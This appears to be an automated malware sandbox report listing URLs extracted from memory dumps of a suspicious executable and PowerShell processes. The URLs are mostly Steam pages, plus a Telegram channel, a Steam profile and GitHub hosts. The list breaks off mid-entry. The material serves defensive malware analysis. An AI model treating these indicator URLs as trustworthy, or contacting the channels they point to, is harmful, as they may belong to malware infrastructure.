                                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                    high
                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/javascrie770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2021300435.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005356000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.00000000051A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/recaptcha/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://checkout.steampowered.com/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://raw.githubusercontent.comYYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbSe770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                high
                                                                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28be770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&ampe770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pnge770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://t.me/m3wm0w(e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://t.me/m3wm0w%e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/Hzzpe770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/;e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/about/76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.cloudflare.steamstatic.com/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/my/wishlist/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://t.me/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://go.mic&ZXpowershell.exe, 0000000B.00000002.2153183743.00000000033E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://web.telegram.orge770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000076D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://github.comYYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbbe770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://help.steampowered.com/en/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://steamcommunity.com/market/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://store.steampowered.com/news/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://contoso.com/Licensepowershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&amp;l=englise770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 